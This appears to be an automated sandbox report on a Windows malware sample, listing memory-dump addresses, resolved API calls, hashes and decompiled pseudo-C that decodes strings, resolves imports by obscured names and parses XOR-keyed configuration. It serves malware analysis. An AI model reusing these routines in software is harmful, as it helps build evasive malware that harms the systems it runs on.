                                                                                                                                                                                                                                          0x011215a5
                                                                                                                                                                                                                                          0x0112151d
                                                                                                                                                                                                                                          0x011215b4
                                                                                                                                                                                                                                          0x011215bd
                                                                                                                                                                                                                                          0x011215c1
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 011257D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,011214AF,?,?,?,?,00000000,00000000), ref: 011257FD
                                                                                                                                                                                                                                            • Part of subcall function 011257D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0112581F
                                                                                                                                                                                                                                            • Part of subcall function 011257D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 01125835
                                                                                                                                                                                                                                            • Part of subcall function 011257D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0112584B
                                                                                                                                                                                                                                            • Part of subcall function 011257D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01125861
                                                                                                                                                                                                                                            • Part of subcall function 011257D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01125877
                                                                                                                                                                                                                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 011214C5
                                                                                                                                                                                                                                          • memset.NTDLL ref: 01121500
                                                                                                                                                                                                                                            • Part of subcall function 011277E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0112333A,73797325), ref: 011277F7
                                                                                                                                                                                                                                            • Part of subcall function 011277E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01127811
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(4E52454B,05648CEF,73797325), ref: 01121536
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0112153D
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 011215A5
                                                                                                                                                                                                                                            • Part of subcall function 0112684E: GetProcAddress.KERNEL32(36776F57,0112935F), ref: 01126869
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 01121582
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 01121587
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001), ref: 0112158B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 478747673-0
                                                                                                                                                                                                                                          • Opcode ID: 87abca9d9955b0e3707a11be35868654f820313058158be77b5ed07bc79b95d9
                                                                                                                                                                                                                                          • Instruction ID: 73bdceacc4460f4fca88570660f76012d26d6fbd704bba8b2fb33b1a1a4285f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87abca9d9955b0e3707a11be35868654f820313058158be77b5ed07bc79b95d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D3170B6800219BFDB28EFE4DC88D9EBBBCEF09344F140565E616A7114D7359A64CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                                                                          			E01124D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				intOrPtr _t9;
                                                                                                                                                                                                                                          				intOrPtr _t13;
                                                                                                                                                                                                                                          				char* _t28;
                                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                          				char* _t36;
                                                                                                                                                                                                                                          				intOrPtr* _t40;
                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                          				char* _t42;
                                                                                                                                                                                                                                          				char* _t43;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t34 = __edx;
                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                          				_t9 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t1 = _t9 + 0x112e62c; // 0x253d7325
                                                                                                                                                                                                                                          				_t36 = 0;
                                                                                                                                                                                                                                          				_t28 = E01126027(__ecx, _t1);
                                                                                                                                                                                                                                          				if(_t28 != 0) {
                                                                                                                                                                                                                                          					_t40 = __imp__;
                                                                                                                                                                                                                                          					_t13 =  *_t40(_t28);
                                                                                                                                                                                                                                          					_v8 = _t13;
                                                                                                                                                                                                                                          					_t41 = E011258BE(_v8 +  *_t40(_a4) + 1);
                                                                                                                                                                                                                                          					if(_t41 != 0) {
                                                                                                                                                                                                                                          						strcpy(_t41, _t28);
                                                                                                                                                                                                                                          						_pop(_t33);
                                                                                                                                                                                                                                          						__imp__(_t41, _a4);
                                                                                                                                                                                                                                          						_t36 = E01126F33(_t34, _t41, _a8);
                                                                                                                                                                                                                                          						E0112147E(_t41);
                                                                                                                                                                                                                                          						_t42 = E01124759(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                                                          						if(_t42 != 0) {
                                                                                                                                                                                                                                          							E0112147E(_t36);
                                                                                                                                                                                                                                          							_t36 = _t42;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t43 = E01124858(_t36, _t33);
                                                                                                                                                                                                                                          						if(_t43 != 0) {
                                                                                                                                                                                                                                          							E0112147E(_t36);
                                                                                                                                                                                                                                          							_t36 = _t43;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					E0112147E(_t28);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t36;
                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                          0x01124d2c
                                                                                                                                                                                                                                          0x01124d2f
                                                                                                                                                                                                                                          0x01124d30
                                                                                                                                                                                                                                          0x01124d38
                                                                                                                                                                                                                                          0x01124d3f
                                                                                                                                                                                                                                          0x01124d46
                                                                                                                                                                                                                                          0x01124d4a
                                                                                                                                                                                                                                          0x01124d50
                                                                                                                                                                                                                                          0x01124d57
                                                                                                                                                                                                                                          0x01124d5c
                                                                                                                                                                                                                                          0x01124d6e
                                                                                                                                                                                                                                          0x01124d72
                                                                                                                                                                                                                                          0x01124d76
                                                                                                                                                                                                                                          0x01124d7c
                                                                                                                                                                                                                                          0x01124d81
                                                                                                                                                                                                                                          0x01124d91
                                                                                                                                                                                                                                          0x01124d93
                                                                                                                                                                                                                                          0x01124daa
                                                                                                                                                                                                                                          0x01124dae
                                                                                                                                                                                                                                          0x01124db1
                                                                                                                                                                                                                                          0x01124db6
                                                                                                                                                                                                                                          0x01124db6
                                                                                                                                                                                                                                          0x01124dbf
                                                                                                                                                                                                                                          0x01124dc3
                                                                                                                                                                                                                                          0x01124dc6
                                                                                                                                                                                                                                          0x01124dcb
                                                                                                                                                                                                                                          0x01124dcb
                                                                                                                                                                                                                                          0x01124dc3
                                                                                                                                                                                                                                          0x01124dce
                                                                                                                                                                                                                                          0x01124dce
                                                                                                                                                                                                                                          0x01124dd9

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 01126027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,01124D46,253D7325,00000000,00000000,74ECC740,?,?,011252FE,?), ref: 0112608E
                                                                                                                                                                                                                                            • Part of subcall function 01126027: sprintf.NTDLL ref: 011260AF
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,011252FE,?,056495B0), ref: 01124D57
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,?,011252FE,?,056495B0), ref: 01124D5F
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          • strcpy.NTDLL ref: 01124D76
                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 01124D81
                                                                                                                                                                                                                                            • Part of subcall function 01126F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,01124D90,00000000,?,?,?,011252FE,?,056495B0), ref: 01126F4A
                                                                                                                                                                                                                                            • Part of subcall function 0112147E: HeapFree.KERNEL32(00000000,00000000,01121D11,00000000,?,?,-00000008), ref: 0112148A
                                                                                                                                                                                                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,011252FE,?,056495B0), ref: 01124D9E
                                                                                                                                                                                                                                            • Part of subcall function 01124759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,01124DAA,00000000,?,?,011252FE,?,056495B0), ref: 01124763
                                                                                                                                                                                                                                            • Part of subcall function 01124759: _snprintf.NTDLL ref: 011247C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                          • String ID: =
                                                                                                                                                                                                                                          • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                          • Opcode ID: 558f85fe6c46112a46eb05dcf8eed7a5f4a81c4f8e4a146ca6c77f1ecca09d1c
                                                                                                                                                                                                                                          • Instruction ID: f1ad245b0bbaeb7b24a16d3986a09f1414f47f26be56daf47f004b6f62af57a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 558f85fe6c46112a46eb05dcf8eed7a5f4a81c4f8e4a146ca6c77f1ecca09d1c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D011E973A0113A77873EBBF89C84CAF3AAD9E655683150115FA08AB504DF74DD3287E4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                          			E011298F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                          				signed int _t18;
                                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                                                          				char* _t29;
                                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                          				char* _t32;
                                                                                                                                                                                                                                          				char* _t33;
                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                                                          				signed int _t50;
                                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                          				signed int _t66;
                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                                          				intOrPtr _t86;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t83 = __esi;
                                                                                                                                                                                                                                          				_t80 = __edi;
                                                                                                                                                                                                                                          				_t72 = __ecx;
                                                                                                                                                                                                                                          				_t69 = __ebx;
                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                          				_t18 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          				if(E011296D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                                                                                                                                                                                                                          					 *0x112d2d0 = _v12;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t23 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          				if(E011296D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                                                                                                                                                                                                                          					_t28 = 2;
                                                                                                                                                                                                                                          					return _t28;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_push(_t69);
                                                                                                                                                                                                                                          					_t70 = _v12;
                                                                                                                                                                                                                                          					_push(_t83);
                                                                                                                                                                                                                                          					_push(_t80);
                                                                                                                                                                                                                                          					if(_t70 == 0) {
                                                                                                                                                                                                                                          						_t29 = 0;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t66 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          						_t29 = E011210CA(_t72, _t70, _t66 ^ 0x48b4463f);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t29 != 0) {
                                                                                                                                                                                                                                          						_t72 =  &_v8;
                                                                                                                                                                                                                                          						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                          							 *0x112d240 = _v8;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t70 == 0) {
                                                                                                                                                                                                                                          						_t30 = 0;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t62 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          						_t30 = E011210CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t30 != 0) {
                                                                                                                                                                                                                                          						_t72 =  &_v8;
                                                                                                                                                                                                                                          						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                          							 *0x112d244 = _v8;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t70 == 0) {
                                                                                                                                                                                                                                          						_t31 = 0;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t58 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          						_t31 = E011210CA(_t72, _t70, _t58 ^ 0x01dd0365);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t31 != 0) {
                                                                                                                                                                                                                                          						_t72 =  &_v8;
                                                                                                                                                                                                                                          						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                          							 *0x112d248 = _v8;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t70 == 0) {
                                                                                                                                                                                                                                          						_t32 = 0;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t54 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          						_t32 = E011210CA(_t72, _t70, _t54 ^ 0x3cf823ca);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t32 != 0) {
                                                                                                                                                                                                                                          						_t72 =  &_v8;
                                                                                                                                                                                                                                          						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                          							 *0x112d004 = _v8;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t70 == 0) {
                                                                                                                                                                                                                                          						_t33 = 0;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t50 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          						_t33 = E011210CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t33 != 0) {
                                                                                                                                                                                                                                          						_t72 =  &_v8;
                                                                                                                                                                                                                                          						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                          							 *0x112d02c = _v8;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t70 == 0) {
                                                                                                                                                                                                                                          						_t34 = 0;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t46 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          						_t34 = E011210CA(_t72, _t70, _t46 ^ 0x163b337e);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t34 != 0) {
                                                                                                                                                                                                                                          						_push(_t34);
                                                                                                                                                                                                                                          						_t43 = 0x10;
                                                                                                                                                                                                                                          						_t44 = E0112A2EF(_t43);
                                                                                                                                                                                                                                          						if(_t44 != 0) {
                                                                                                                                                                                                                                          							_push(_t44);
                                                                                                                                                                                                                                          							E01129B10();
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t70 == 0) {
                                                                                                                                                                                                                                          						_t35 = 0;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t41 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          						_t35 = E011210CA(_t72, _t70, _t41 ^ 0x89f501b6);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t35 != 0 && E0112A2EF(0, _t35) != 0) {
                                                                                                                                                                                                                                          						_t86 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          						E01124C3A(_t86 + 4, _t39);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, 0, _t70);
                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}





























                                                                                                                                                                                                                                          0x011298f7
                                                                                                                                                                                                                                          0x011298f7
                                                                                                                                                                                                                                          0x011298f7
                                                                                                                                                                                                                                          0x011298f7
                                                                                                                                                                                                                                          0x011298fa
                                                                                                                                                                                                                                          0x011298fb
                                                                                                                                                                                                                                          0x011298fc
                                                                                                                                                                                                                                          0x01129916
                                                                                                                                                                                                                                          0x01129924
                                                                                                                                                                                                                                          0x01129924
                                                                                                                                                                                                                                          0x01129929
                                                                                                                                                                                                                                          0x01129943
                                                                                                                                                                                                                                          0x01129ad2
                                                                                                                                                                                                                                          0x01129ad4
                                                                                                                                                                                                                                          0x01129949
                                                                                                                                                                                                                                          0x01129949
                                                                                                                                                                                                                                          0x0112994a
                                                                                                                                                                                                                                          0x0112994d
                                                                                                                                                                                                                                          0x0112994e
                                                                                                                                                                                                                                          0x01129953
                                                                                                                                                                                                                                          0x01129969
                                                                                                                                                                                                                                          0x01129955
                                                                                                                                                                                                                                          0x01129955
                                                                                                                                                                                                                                          0x01129962
                                                                                                                                                                                                                                          0x01129962
                                                                                                                                                                                                                                          0x01129973
                                                                                                                                                                                                                                          0x01129975
                                                                                                                                                                                                                                          0x0112997f
                                                                                                                                                                                                                                          0x01129984
                                                                                                                                                                                                                                          0x01129984
                                                                                                                                                                                                                                          0x0112997f
                                                                                                                                                                                                                                          0x0112998b
                                                                                                                                                                                                                                          0x011299a1
                                                                                                                                                                                                                                          0x0112998d
                                                                                                                                                                                                                                          0x0112998d
                                                                                                                                                                                                                                          0x0112999a
                                                                                                                                                                                                                                          0x0112999a
                                                                                                                                                                                                                                          0x011299a5
                                                                                                                                                                                                                                          0x011299a7
                                                                                                                                                                                                                                          0x011299b1
                                                                                                                                                                                                                                          0x011299b6
                                                                                                                                                                                                                                          0x011299b6
                                                                                                                                                                                                                                          0x011299b1
                                                                                                                                                                                                                                          0x011299bd
                                                                                                                                                                                                                                          0x011299d3
                                                                                                                                                                                                                                          0x011299bf
                                                                                                                                                                                                                                          0x011299bf
                                                                                                                                                                                                                                          0x011299cc
                                                                                                                                                                                                                                          0x011299cc
                                                                                                                                                                                                                                          0x011299d7
                                                                                                                                                                                                                                          0x011299d9
                                                                                                                                                                                                                                          0x011299e3
                                                                                                                                                                                                                                          0x011299e8
                                                                                                                                                                                                                                          0x011299e8
                                                                                                                                                                                                                                          0x011299e3
                                                                                                                                                                                                                                          0x011299ef
                                                                                                                                                                                                                                          0x01129a05
                                                                                                                                                                                                                                          0x011299f1
                                                                                                                                                                                                                                          0x011299f1
                                                                                                                                                                                                                                          0x011299fe
                                                                                                                                                                                                                                          0x011299fe
                                                                                                                                                                                                                                          0x01129a09
                                                                                                                                                                                                                                          0x01129a0b
                                                                                                                                                                                                                                          0x01129a15
                                                                                                                                                                                                                                          0x01129a1a
                                                                                                                                                                                                                                          0x01129a1a
                                                                                                                                                                                                                                          0x01129a15
                                                                                                                                                                                                                                          0x01129a21
                                                                                                                                                                                                                                          0x01129a37
                                                                                                                                                                                                                                          0x01129a23
                                                                                                                                                                                                                                          0x01129a23
                                                                                                                                                                                                                                          0x01129a30
                                                                                                                                                                                                                                          0x01129a30
                                                                                                                                                                                                                                          0x01129a3b
                                                                                                                                                                                                                                          0x01129a3d
                                                                                                                                                                                                                                          0x01129a47
                                                                                                                                                                                                                                          0x01129a4c
                                                                                                                                                                                                                                          0x01129a4c
                                                                                                                                                                                                                                          0x01129a47
                                                                                                                                                                                                                                          0x01129a53
                                                                                                                                                                                                                                          0x01129a69
                                                                                                                                                                                                                                          0x01129a55
                                                                                                                                                                                                                                          0x01129a55
                                                                                                                                                                                                                                          0x01129a62
                                                                                                                                                                                                                                          0x01129a62
                                                                                                                                                                                                                                          0x01129a6d
                                                                                                                                                                                                                                          0x01129a6f
                                                                                                                                                                                                                                          0x01129a72
                                                                                                                                                                                                                                          0x01129a73
                                                                                                                                                                                                                                          0x01129a7a
                                                                                                                                                                                                                                          0x01129a7c
                                                                                                                                                                                                                                          0x01129a7d
                                                                                                                                                                                                                                          0x01129a7d
                                                                                                                                                                                                                                          0x01129a7a
                                                                                                                                                                                                                                          0x01129a84
                                                                                                                                                                                                                                          0x01129a9a
                                                                                                                                                                                                                                          0x01129a86
                                                                                                                                                                                                                                          0x01129a86
                                                                                                                                                                                                                                          0x01129a93
                                                                                                                                                                                                                                          0x01129a93
                                                                                                                                                                                                                                          0x01129a9e
                                                                                                                                                                                                                                          0x01129aac
                                                                                                                                                                                                                                          0x01129ab6
                                                                                                                                                                                                                                          0x01129ab6
                                                                                                                                                                                                                                          0x01129ac3
                                                                                                                                                                                                                                          0x01129acf
                                                                                                                                                                                                                                          0x01129acf

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0112D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,01124A8B), ref: 0112997B
                                                                                                                                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0112D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,01124A8B), ref: 011299AD
                                                                                                                                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0112D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,01124A8B), ref: 011299DF
                                                                                                                                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0112D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,01124A8B), ref: 01129A11
                                                                                                                                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0112D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,01124A8B), ref: 01129A43
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000005,0112D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,01124A8B), ref: 01129AC3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                          • Opcode ID: 3f9ddf74857f33e2bd967964925bb7d1b2336e41cc31d9a5d510ead25236a108
                                                                                                                                                                                                                                          • Instruction ID: be933a523c4049b906e5afcb176efe712d2e5b154fb4c51a6e19d741f611b4ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f9ddf74857f33e2bd967964925bb7d1b2336e41cc31d9a5d510ead25236a108
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F517360B00239FEDF2CDABDED84D5B76EDAB88618B640925E601D7108F774D9608721
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 011213B5
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(0070006F), ref: 011213C9
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 011213DB
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 01121443
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 01121452
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0112145D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 344208780-0
                                                                                                                                                                                                                                          • Opcode ID: 5797186ce867acb381608edae487203ea48bde007f8e4faa1ee53cf4a85d8b43
                                                                                                                                                                                                                                          • Instruction ID: 3086a08ad9fb58cf0646890994be4c95bd225bba3d35bb0186e3887735b94127
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5797186ce867acb381608edae487203ea48bde007f8e4faa1ee53cf4a85d8b43
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E419E3690060ABFDB15EFFCD844A9FBBBAEF49200F104426EA14EB110DB71D956CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E011257D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				intOrPtr _t23;
                                                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                          				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                          				intOrPtr _t54;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t54 = E011258BE(0x20);
                                                                                                                                                                                                                                          				if(_t54 == 0) {
                                                                                                                                                                                                                                          					_v8 = 8;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t23 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t1 = _t23 + 0x112e11a; // 0x4c44544e
                                                                                                                                                                                                                                          					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                                                          					_t26 =  *0x112d2a4; // 0x451a5a8
